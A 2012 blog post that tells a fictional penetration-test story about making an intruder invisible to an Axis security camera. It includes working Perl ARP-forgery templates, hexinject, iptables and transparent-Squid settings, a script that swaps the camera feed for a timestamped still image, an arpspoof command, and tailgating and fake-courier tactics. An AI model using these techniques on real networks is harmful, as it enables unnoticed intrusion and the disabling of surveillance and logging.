The invisible woman and the axis camera

04 Feb 2012


NOTE: This post follows the style of the stealing the network series of books. Sometimes, when I think about a technique or a skill I consider interesting, I also imagine a real-life scenario where this technique can be applied (and I'm not the only one...)

So, why not combining technical explanations with realistic stories, avoiding the usual, and sometimes boring, article style?

Of course I don't consider myself as good as the authors of the "official" series, especially when it comes to write a story in a language that is not mine. What follows is just a modest experiment, done largely for my own pleasure.

If you are only interested in technical subjects, the story includes a security camera hijack via real-time image alteration, some interesting tricks with ARP packets (of which one I bet you never heard of), and a bit of physical penetration test.

Anyway, I hope you'll like it...


Anti-aircraft Artillery

After all, entering the internal network wasn't difficult...

When we initially identified a WEP wireless network, we wanted to seize that low hanging fruit and avoid direct contacts with the customer as long as possible. But the enthusiasm was short-lived.

"Aren't you planning to crack that network, are you?" said GrayFog in a tone of disapproval, "According to the Mac address, the access point is a SonicWALL. Maybe they have maintained an obsolete encryption for backward compatibility issues, or maybe not. "

GrayFog is our remote support, the fact he's a paranoid type by nature makes him particularly suitable for this role.

"Do you think it's an honeypot?" I replied.

"I think nothing, my lord. But you know, Curiosity Killed The Cat..."

sonicwall

When he starts to quote I feel an irresistible urge to beat him, but, as we discovered later, his advice was correct. The wireless network was kept under control, and any attack would have been detected immediately, if not actively blocked (apparently there's a reason for the price of SonicWALL products...)

Despite this drawback, we could have tried to decrypt the traffic in a passive manner, but since network traffic was very low, it would have taken too much time. However I had an ace up my sleeve.

"Since you are in citation mode, who said 'In battle one engages with the orthodox and gains victory through the unorthodox'?" Just a rhetorical question...

"Are you kidding me?"

"Returning to more concrete things, do you have a plan Luna?" For the first time Daniel was talking, my partner in physical operations.

"Yes, I do. But we must get our hands dirty, something low-tech."

Orthodox and Unorthodox

Being a woman, working in this field brings some important advantages, if you are tough enough to resist.

The predominant male presence, if properly exploited, allows a young girl to pass almost unnoticed during penetration tests that focus on low-tech or physical aspects. And when this doesn't happen, we are often underestimated, considered harmless.

This may be annoying in traditional occupations, but a lethal weapon in the security field.

"Daniel, I need to enter the building to open a connection to the internal network." I said while exiting our van, "Let's try to tailgate someone through the back entrance."

The plan was simple: first we checked to make sure no one was outside, and then started to talk near the back door.  From what we had seen in the previous days that door was used especially by smokers seeking a breath of fresh air.

As expected, after about ten minutes, a small group of employees started to walk out the door.

When the last person was came out, I casually kept the door open and said to Daniel it was time to return to work. Daniel simply replied he had forgotten some documents and started to walk towards the car park.

Then I went in, nobody stopped me.

Once inside I began to search for the rooms that were the objectives of our penetration testing. We had a rough map of the building, but good enough for our purposes.

It didn't take long to find the Archive Room, but there seemed to be another small problem: "Hey guys, I found the room, but there's an Axis camera pointed toward the door."

"Ok, we'll deal with it later, for now just open an access point to the internal network."

So I proceeded to the room of network administrators. With a quick glance I checked what was happening inside: as expected, only one administrator was in the room at this time of day.

"Daniel, I need you to proceed with the 'delivery' to distract the administrator. Buy me a couple of minutes."

We had done some research and prepared a false "gift from a supplier", addressed to the administrator and requiring his signature on the package receipt. My task was simple, a few minutes would have sufficed, although it would have been funny to see Daniel disguised as a courier...

First of all I plugged in our alternative "access point" to the internal network: a powerline ethernet adapter.

powerline ethernet adapter

"They installed a Wireless-IDS, but certainly they don't expect anyone to access the network through the electrical system."

I also noticed something very interesting: a workstation was used to monitor the security cameras... through the web interface of the devices!

"Probably the Axis Camera protecting the archive is among the displayed videos." I thought. "That's a job for GrayFog..."

(Brief) Briefing

Luna retreated to the bathroom and locked herself in one of the small rooms. It was not the most comfortable place of the building, but it was relatively safe and she wouldn't be disturbed here.

"Daniel, the gate is open, it's your turn now."

"Cool, let's see if the suit suits you Daniel..." GrayFog said, serious as ever.

In the entrance of the building there were some armchairs, a sort of waiting room, accessible without showing any badges.

For safety Daniel was wearing a facsimile of the badges used by the company: only to provide a more realistic image, it wouldn't have passed in the magnetic reader.

He sat next to an electrical outlet, a place not too visible but not hidden, and inserted the other powerline adapter.

"Good, there's signal. I'm starting an hidden wireless network for you, GrayFog"

"Thanks!" He replied, "Any suggestions on where to start?"

"Since our goal is access to the archive room, you could start disabling the security camera." Daniel said.

"Actually I think there is a better and more artistic way..." replied Luna hiding a smile, "...just make me invisible."

Hide and Seek

"I already know the IP address of the camera, the real question is: who talks to whom?"

GrayFog was thinking about how to find out which computers were connected to the camera, the one who where monitoring via the web interface and the server where the videos were probably sent and stored.

He remembered an old style, but very cool, defcon presentation: LAN Protocol Attacks Part 1 - ARP Reloaded.

"I can use their broadcast technique, but for the opposite purpose."

The presentation showed that it is possible to conduct a MITM attack against a computer in a LAN, without exposing any mac address, just poisoning its cache with a broadcast layer2 destination address. In this way the behavior of the network switch becomes like that of an old hub, forwarding target's packets to all its network ports.

"I think this might work in reverse: announcing with an ARP packet that the camera has a broadcast MAC, should make me able to sniff all the IPs that are communicating with it. And maybe get also a few packets of the communication."

GrayFog modified on the fly one of his perl scripts, containing the structure of an ARP packet:

#!/usr/bin/perl

print
# ethernet header
    "ff ff ff ff ff ff " . # destination
    "aa bb cc dd ee ff " . # source
    "08 06 " .             # type (ARP)
# arp header
    "00 01 " .             # hardware type (ethernet)
    "08 00 " .             # protocol type (ip)
    "06 " .                # hardware size
    "04 " .                # protocol size
    "00 01 " .             # reply
    "ff ff ff ff ff ff " . # sender mac (broadcast mac for the axis camera)
    "c0 a8 01 09 " .       # sender ip (ip of teh axis camera)
    "ff ff ff ff ff ff " . # target mac (broadcast)
    "ff ff ff ff " .       # target ip (broadcast)
    "\n";

He than injected the packet using hexinject:

root@daedalus# perl ./arp_packet.pl | sudo hexinject -p

The advantage of using this approach is that is possible to keep the packet's structure separated from the injecting code. GrayFog liked to maintain a directory containing templates (saved as perl, python or even bash scripts) for each protocol he used so far, always ready for this kind of network magic.

Immediately after sending the package, tcpdump began to print output. Two hosts were particularly interesting: the first performed HTTP requests to the page "video.cgi", the second showed FTP traffic.

"Luna, I found the administrator's computer" said GrayFog in the microphone, "and also the FTP server used to log events. Just a little, and you'll have every right to quote Susan Storm..."

As Dumb as a Squid

"The FTP server is very easy to handle: I'll just impose it the silence."

Another interesting technique from the defcon presentation was sending an ARP packet to the victim saying the log server is at its local interface. After that, successive log packets sent by the victim never reach the network, since the kernel forwards them to the loopback interface.

ethernet host silenced

Even this time preparing the attack was a matter of seconds:

#!/usr/bin/perl

print
# ethernet header
    "c0 ff ee c0 ff ee " . # destination
    "aa bb cc dd ee ff " . # source
    "08 06 " .             # type (ARP)
# arp header
    "00 01 " .             # hardware type (ethernet)
    "08 00 " .             # protocol type (ip)
    "06 " .                # hardware size
    "04 " .                # protocol size
    "00 01 " .             # reply
    "c0 ff ee c0 ff ee " . # sender mac (camera mac address)
    "c0 a8 01 0a " .       # sender ip (ftp server ip)
    "c0 ff ee c0 ff ee " . # target mac 
    "c0 a8 01 09 " .       # target ip (camera ip)
    "\n";

After starting a script to repeatedly inject silencer packets, GrayFog turned his attention to the monitoring host.

To analyze the requests made ​​to the camera, he used a nice tool called httpry, able to extract and parse HTTP request sniffed from the network:

root@daedalus# httpry
httpry version 0.1.5 -- HTTP logging and information retrieval tool
Copyright (c) 2005-2009 Jason Bittel <jason.bittel@gmail.com>
Starting capture on eth0 interface
2012-02-04 12:41:48    192.168.1.30     192.168.1.9    >    GET    192.168.1.9    /view/view.shtml    HTTP/1.1    -    -
2012-02-04 12:41:49     192.168.1.9    192.168.1.30    <    -    -    -    HTTP/1.0    200    OK
2012-02-04 12:41:49    192.168.1.30     192.168.1.9    >    GET    192.168.1.9    /css/other.css    HTTP/1.1    -    -
2012-02-04 12:41:49     192.168.1.9    192.168.1.30    <    -    -    -    HTTP/1.0    304    Not Modified
2012-02-04 12:41:49    192.168.1.30     192.168.1.9    >    GET    192.168.1.9    /axis-cgi/mjpg/video.cgi?camera=&resolution=704x576&1328355709315    HTTP/1.1    -    -
...
^CCaught SIGINT, shutting down...
2105 packets received, 0 packets dropped, 8 http packets parsed
  6014.3 packets/min, 22.9 http packets/min

"Umm... I think Squid can do the job!"

Squid is the standard de facto in the field of open source web proxies. Thousands of providers around the world use it for its versatility and stability. In addition, the abilities to act as a transparent proxy and to modify requests through the use of external scripts make it a powerful tool in the hands of a penetration tester.

GrayFog wrote the iptables rules needed to transparently redirect HTTP packets to the squid server running on his machine:

iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080

The second thing he did was to enable transparent mode in /etc/squid3/squid.conf and add a line to call an external script for the analysis and alteration of requests:

http_port 8080 transparent

acl manager proto cache_object

acl localhost src 127.0.0.1/32 ::1
acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 ::1
acl lan_net src 192.168.1.0/24

http_access allow lan_net

#http_access deny CONNECT !SSL_ports # comment this line

redirect_program /tmp/test.pl # external script
Then he captured a camera snapshot, removed the timestamp line from the image and wrote (yet) another script:
#!/usr/bin/perl

$|=1;
$count = 0;
$pid = $$;

while (<>) {
        chomp $_;
        if ($_ =~/video\.cgi/i) {
                $url = $1;

                # get current timestamp
                $date_output = `date`;

                # update snapshot timestamp
                system("convert /tmp/original_snapshot.jpg -crop 0x0+20+20 -fill White -background Black label:'Camera Text - $date_output' +swap -append /var/www/snapshot.jpg");

                # redirect to our modified snapshot
                print "http://localhost/snapshot.jpg\n";

        }
        else {
                print "$_\n";;
        }
        $count++;
}

This last script analyzes HTTP requests searching for queries containing "video.cgi". When a matching request is found, it's redirected to a modified snapshot hosted on the attacker's machine.

The snapshot is a static image, but its time-stamp is updated in real time with the aid of imagemagick, making the attack realistic and difficult to spot.

An example of the technique (original image):

original axis camera image

Altered image:

altered axis camera image

"Yes, the font of the timestamp could be improved a bit," mumbled GrayFog "but in this case there is no need to complicate things further." And he just launched arpspoof, to start the MITM:

# arpspoof -t 192.168.1.30 192.168.1.9

"Luna, could you please end this mission?" He said. "Ah! I was also thinking whether to call you Miss Storm from now on..."

"Only if you do not expect to be called Mr. Fantastic..." she replied.

Conclusion, Surprise, Misery on us

When we presented photos and photocopies of documents taken from the archive, in the conclusive meeting with our customers, everyone was very skeptical. Especially when we explained some "technical details" of the penetration test.

Indeed, once bypassed the camera, picking the archive's lock was a breeze...

They even made us simulate the last part of the attack. The managers and the admins were not very happy when I started to walk past the camera and, despite the accurate time-stamp, my movements didn't appear either in the web interface or on the FTP server.

But I could swear that at least one of the administrators held a laugh: the most clever of the group...